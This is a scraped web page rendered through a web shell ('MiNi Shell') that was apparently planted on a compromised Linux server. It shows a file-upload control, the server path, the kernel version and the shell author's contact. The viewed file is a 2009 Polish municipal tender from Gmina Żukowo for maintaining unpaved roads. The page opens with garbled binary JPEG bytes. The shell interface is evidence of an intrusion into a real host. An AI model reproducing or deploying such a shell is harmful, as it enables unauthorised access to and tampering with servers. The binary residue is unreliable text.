JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/27975-N-2009.html

<p class="kh_header"><b>Żukowo: Utrzymanie w przejezdności gruntowych nieutwardzonych dróg i ulic gminnych w Gminie Żukowo.</b><br>
<b>Numer ogłoszenia: 27975 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie w przejezdności gruntowych nieutwardzonych dróg i ulic gminnych w Gminie Żukowo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie składa się z dwóch części:
Część I: utrzymanie w przejezdności gruntowych nieutwardzonych dróg i ulic gminnych w Rejonie Północnym Gminy Żukowo (Banino, Chwaszczyno, Nowy Świat, Leźno, Małkowo, Miszewo, Pępowo, Rębiechowo, Tuchom, Żukowo);
Część II: utrzymanie w przejezdności gruntowych nieutwardzonych dróg i ulic gminnych w Rejonie Południowym Gminy Żukowo (Borkowo, Glincz, Łapino, Otomino, Niestępowo, Przyjaźń, Rutki, Sulmin, Skrzeszewo, Widlino).
Wykaz dróg i ulic gminnych dla rejonu I i II zamówienia stanowi załącznik nr 7a i 7b do siwz. Zawartość tego załącznika stanowi integralną część umowy - jako załącznik nr 1 do umowy.
Wykonawca może złożyć ofertę na obie części zamówienia.
2.Prace związane z utrzymaniem w przejezdności nieutwardzonych, gruntowych dróg i ulic gminnych obejmują: profilowanie i zagęszczanie nawierzchni, kształtowanie dróg i ulic gruntowych oraz zebranie, usunięcie i wywiezienie kamieni, które pozostały na nawierzchni dróg i ulic. Z uwagi na zróżnicowany rodzaj gruntu oraz różny stopień zniszczenia nawierzchni należy dostosować liczbę przejazdów równiarki do uzyskania odpowiedniego profilu drogi. Profilowaną drogę należy wyrównać walcem drogowym, zwłaszcza przy spulchnieniu i rozścieleniu gruntu na drodze.
3. Profilowanie dróg na terenie gminy, polega na poprawieniu poprzecznego przekroju drogi i wyrównaniu jej nierówności w celu lepszego odwodnienia drogi. W czasie równania równiarka powinna: wyrównać wyboje ziemią otrzymaną przez ścięcie, nierówności powstałych z materiału wyniesionego z wybojów przez koła pojazdów oraz z nierównomiernego zagęszczenia jezdni oraz odtworzyć profil pierwotny przez ścięcie poboczy i przesunięcie otrzymanej stąd ziemi ku środkowi drogi z jednoczesnym wyrównaniem kolein.
4.Łączna długość dróg i ulic objętych zamówieniem wynosi 450 km, średnia szerokość drogi lub ulicy wynosi 6 m (jednak nie mniej niż 4 m). 
5. Zakres wykonania usług: 
a) jednorazowo na drogach i ulicach gminnych w Rejonie Północnym Gminy Żukowo (max 250 km),
b) jednorazowo na drogach i ulicach gminnych w Rejonie Południowym Gminy Żukowo (max 200 km),
c) powtórnie na wybranych drogach i ulicach w Rejonie Północnym Gminy Żukowo (max 150 km),
d) powtórnie na wybranych drogach i ulicach w Rejonie Południowym Gminy Żukowo (max 100 km),
6. Dla celów obliczenia oferty należy przyjąć, że usługa zostanie wykonana na długości max:
- Rejon Północny Gminy Żukowo 400 km dróg i ulic gminnych (min długość dróg i ulic gminnych objętych zamówieniem - 250 km)
- Rejon Południowy Gminy Żukowo 300 km dróg i ulic gminnych (min długość dróg i ulic gminnych objętych zamówieniem - 200 km).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy spełnią poniższe warunki: 
1. Zrealizowali w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia: 
- dla części I zamówienia: co najmniej jedno zamówienie polegające na naprawie, profilowaniu, kształtowaniu dróg i ulic gruntowych nieutwardzonych o wartości (dla jednego zrealizowanego zamówienia) minimum 150.000,00 PLN brutto;
- dla części II zamówienia: co najmniej jedno zamówienie polegające na naprawie, profilowaniu, kształtowaniu dróg i ulic gruntowych nieutwardzonych o wartości (dla jednego zrealizowanego zamówienia) minimum 150.000,00 PLN brutto;
Ocena spełnienia warunku odbędzie się na podstawie wykazu usług zrealizowanych w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia - (zał. nr 5 do siwz - Wykaz zrealizowanych zadań na część I bądź część II) wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie (referencje).
UWAGA! W przypadku gdy wykonawca złoży ofertę jednocześnie na część I i część II zamówienia wówczas powinien przedstawić w/w wykazie co najmniej jedno zamówienie polegające na naprawie, profilowaniu, kształtowaniu dróg i ulic gruntowych nieutwardzonych o wartości min. 300.000,00 PLN brutto.
2. Spełnia warunki określone w art. 22 ust. 1 pkt 1 PZP, a zatem posiada uprawnienia do wykonywania określonej działalności lub czynności:
1) Posiada uprawnienia do występowania w obrocie prawnym i udokumentuje, że prowadzi działalność gospodarczą zgodną z zakresem przedmiotu zamówienia określonym w postępowaniu. 
Ocena spełnienia warunku odbędzie się na podstawie dokumentu stwierdzającego prawo do występowania w obrocie prawnym: aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2) Zgodnie z art. 22 ust. 1 pkt 2 PZP posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia.
Ocena spełnienia w/w warunków odbędzie się na podstawie: 
informacji dotyczącej sprzętu i wyposażenia technicznego przewidzianego do wykonywania zamówienia, tzn. wymóg, co najmniej: 
1) jedna maszyna do robót ziemnych samojezdna - równiarka ze zrywakiem i lemieszem środkowym o szerokości lemiesza  min. 3.500 mm,
2) jedna maszyna do zagęszczania gruntów - walec drogowy 5-10 t:
a)	statyczny, 
b)	jednowałowy,
c)	z wałem stalowym gładkim,
d)	samojezdny lub przyczepny z ciągnikiem; 
UWAGA! W przypadku gdy wykonawca złoży ofertę jednocześnie na część I i część II zamówienia wówczas powinien wskazać w wykazie sprzętu dwie równiarki ze zrywakiem i lemieszem środkowym o szerokości lemiesza min. 3.500 mm, oraz dwa walce drogowe 5 - 10 ton (rodzaje wskazane w/w punktach: a-d). Niniejsze informacje należy zamieścić w zał. nr 3 do siwz - Wykaz sprzętu na część I bądź część II.)	
3). Zgodnie z art. 22 ust. 1 pkt 2 PZP dysponuje osobami zdolnymi do wykonania zamówienia, w tym co najmniej jednego operatora posiadającego uprawnienia i kwalifikacje do prowadzenia równiarki oraz co najmniej jednego operatora posiadającego uprawnienia i kwalifikacje do prowadzenia walca drogowego; lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Wykonawca powinien dołączyć kserokopie dokumentów potwierdzających uprawnienia do kierowania sprzętem - równiarką oraz walcem drogowym:
1) świadectwo operatora sprzętu wydane na podstawie przepisów Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263), 
2) książkę  operatora - strony 2-5 wydaną na podstawie przepisów Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263).
UWAGA! W przypadku gdy wykonawca złoży ofertę jednocześnie na część I i część II zamówienia wówczas powinien wskazać w wykazie kadry co najmniej dwóch operatorów posiadających uprawnienia i kwalifikacje do prowadzenia równiarki oraz co najmniej dwóch operatorów posiadających uprawnienia i kwalifikacje do prowadzenia walca drogowego, odpowiednio dla każdej z części zamówienia. Niniejsze informacje należy zamieścić w zał. nr 4 do siwz - Wykaz kadry na część I bądź część II.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Ocena spełnienia w/w warunków odbędzie się na podstawie: 
Oświadczenia nr 2 Wykonawcy o spełnieniu warunków udziału w postępowaniu (treść oświadczenia określa zał. nr 2 do siwz);
Wykonawca powinien wykazać w odpowiednim wykazie (zob.: zał. nr 3 i 4 do siwz) wymagany przez Zamawiającego potencjał techniczny i osoby zdolne do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Zobowiązanie stanowi załącznik do Oświadczenia nr 2 (zał. nr 2 do siwz);
4. Nie podlega wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 PZP). 
Ocena spełnienia warunku odbędzie się na podstawie: 
- oświadczenia nr 1 Wykonawcy o spełnieniu warunków udziału w postępowaniu (treść oświadczenia określa zał. nr 2 do siwz).
5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu muszą zostać spełnione, odpowiednio:
1) przez każdego Wykonawcę (osobno) - warunki określone w art. 22 ust. 1 pkt 4 PZP,
2) przez wszystkich Wykonawców (łącznie) - warunki określone w art. 22 ust. 1 pkt 1 - 3 PZP.
Oświadczenie złożone przez pełnomocnika Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia jest równoznaczne ze złożeniem oświadczenia przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Wykonawca, pod rygorem wykluczenia z postępowania, musi do upływu terminu składania ofert (z wyjątkiem okoliczności opisanych w art. 26 ust. 3 PZP) wykazać, że spełnia warunki udziału w postępowaniu postawione przez Zamawiającego, tzn. Wykonawca zobowiązany jest w ofercie przedstawić niezbędne dokumenty potwierdzające (w sposób nie budzący żadnych wątpliwości) spełnienie warunków określonych w/w pkt..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Formularz oferty i formularz cenowy (zał. nr 1 do siwz).
2. Oświadczenie nr 2 - o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 pkt. 1 - 3 PZP (zał. nr 2 do siwz);
3. Oświadczenie nr 1 - że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 PZP (zał. nr 2 do siwz);
4. Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej to zamiast dokumentu, o którym mowa w pkt 4, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że nie otwarto jego likwidacji ani nie ogłoszono upadłości - jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5. Wykonawca składa:
1) wykaz sprzętu na poszczególną część zamówienia (zał. nr 3 do siwz);
2) wykaz kadry na poszczególną część zamówienia (zał. nr 4 do siwz);
3) wykaz zrealizowanych zadań na poszczególną część zamówienia (zał. nr 5 do siwz);
6. Wykonawca powinien również załączyć do oferty:
1) Oświadczenie nr 3 - o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom (zał. nr 2 do siwz);
2) Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy - w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 23 ust. 2 PZP);
3) W przypadku osoby (osób) działającej w imieniu Wykonawcy w oparciu o odrębnie udzielone pełnomocnictwo, w ofercie należy złożyć: oryginał pełnomocnictwa lub jego notarialnie potwierdzoną kopię .
7. Wykonawca składa dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Dokumenty w językach obcych składa się wraz z tłumaczeniem ich treści na język polski, poświadczonym przez Wykonawcę.
Spełnienie warunków udziału w postępowaniu Zamawiający ocenia w systemie zero-jedynkowym, tzn. spełnia lub nie spełnia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zukowo.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żukowo ul. Gdańska 52 83 -330 Żukowo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2009 godzina 10:00, miejsce: Urząd Gminy Żukowo (Kancelaria - pokój nr 4).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie w przejezdności gruntowych nieutwardzonych dróg i ulic gminnych w Rejonie Północnym Gminy Żukowo (Banino, Chwaszczyno, Nowy Świat, Leźno, Małkowo, Miszewo, Pępowo, Rębiechowo, Tuchom, Żukowo)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace związane z utrzymaniem w przejezdności nieutwardzonych, gruntowych dróg i ulic gminnych obejmują: profilowanie i zagęszczanie nawierzchni, kształtowanie dróg i ulic gruntowych oraz zebranie, usunięcie i wywiezienie kamieni, które pozostały na nawierzchni dróg i ulic. Z uwagi na zróżnicowany rodzaj gruntu oraz różny stopień zniszczenia nawierzchni należy dostosować liczbę przejazdów równiarki do uzyskania odpowiedniego profilu drogi. Profilowaną drogę należy wyrównać walcem drogowym, zwłaszcza przy spulchnieniu i rozścieleniu gruntu na drodze.
2. Profilowanie dróg na terenie gminy, polega na poprawieniu poprzecznego przekroju drogi i wyrównaniu jej nierówności w celu lepszego odwodnienia drogi. W czasie równania równiarka powinna: wyrównać wyboje ziemią otrzymaną przez ścięcie, nierówności powstałych z materiału wyniesionego z wybojów przez koła pojazdów oraz z nierównomiernego zagęszczenia jezdni oraz odtworzyć profil pierwotny przez ścięcie poboczy i przesunięcie otrzymanej stąd ziemi ku środkowi drogi z jednoczesnym wyrównaniem kolein.
3.Średnia szerokość drogi lub ulicy wynosi 6 m (jednak nie mniej niż 4 m). 
4. Zakres wykonania usług: 
a) jednorazowo na drogach i ulicach gminnych w Rejonie Północnym Gminy Żukowo (max 250 km),
b) powtórnie na wybranych drogach i ulicach w Rejonie Północnym Gminy Żukowo (max 150 km),
5. Dla celów obliczenia oferty należy przyjąć, że usługa zostanie wykonana na długości max:
- Rejon Północny Gminy Żukowo 400 km dróg i ulic gminnych (min długość dróg i ulic gminnych objętych zamówieniem - 250 km)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie w przejezdności gruntowych nieutwardzonych dróg i ulic gminnych w Rejonie Południowym Gminy Żukowo (Borkowo, Glincz, Łapino, Otomino, Niestępowo, Przyjaźń, Rutki, Sulmin, Skrzeszewo, Widlino)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace związane z utrzymaniem w przejezdności nieutwardzonych, gruntowych dróg i ulic gminnych obejmują: profilowanie i zagęszczanie nawierzchni, kształtowanie dróg i ulic gruntowych oraz zebranie, usunięcie i wywiezienie kamieni, które pozostały na nawierzchni dróg i ulic. Z uwagi na zróżnicowany rodzaj gruntu oraz różny stopień zniszczenia nawierzchni należy dostosować liczbę przejazdów równiarki do uzyskania odpowiedniego profilu drogi. Profilowaną drogę należy wyrównać walcem drogowym, zwłaszcza przy spulchnieniu i rozścieleniu gruntu na drodze.
2. Profilowanie dróg na terenie gminy, polega na poprawieniu poprzecznego przekroju drogi i wyrównaniu jej nierówności w celu lepszego odwodnienia drogi. W czasie równania równiarka powinna: wyrównać wyboje ziemią otrzymaną przez ścięcie, nierówności powstałych z materiału wyniesionego z wybojów przez koła pojazdów oraz z nierównomiernego zagęszczenia jezdni oraz odtworzyć profil pierwotny przez ścięcie poboczy i przesunięcie otrzymanej stąd ziemi ku środkowi drogi z jednoczesnym wyrównaniem kolein.
3.Średnia szerokość drogi lub ulicy wynosi 6 m (jednak nie mniej niż 4 m). 
4. Zakres wykonania usług: 
a) jednorazowo na drogach i ulicach gminnych w Rejonie Południowym Gminy Żukowo (max 200 km),
b) powtórnie na wybranych drogach i ulicach w Rejonie Południowym Gminy Żukowo (max 100 km),
5. Dla celów obliczenia oferty należy przyjąć, że usługa zostanie wykonana na długości max:
- Rejon Południowy Gminy Żukowo 300 km dróg i ulic gminnych (min długość dróg i ulic gminnych objętych zamówieniem - 200 km)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com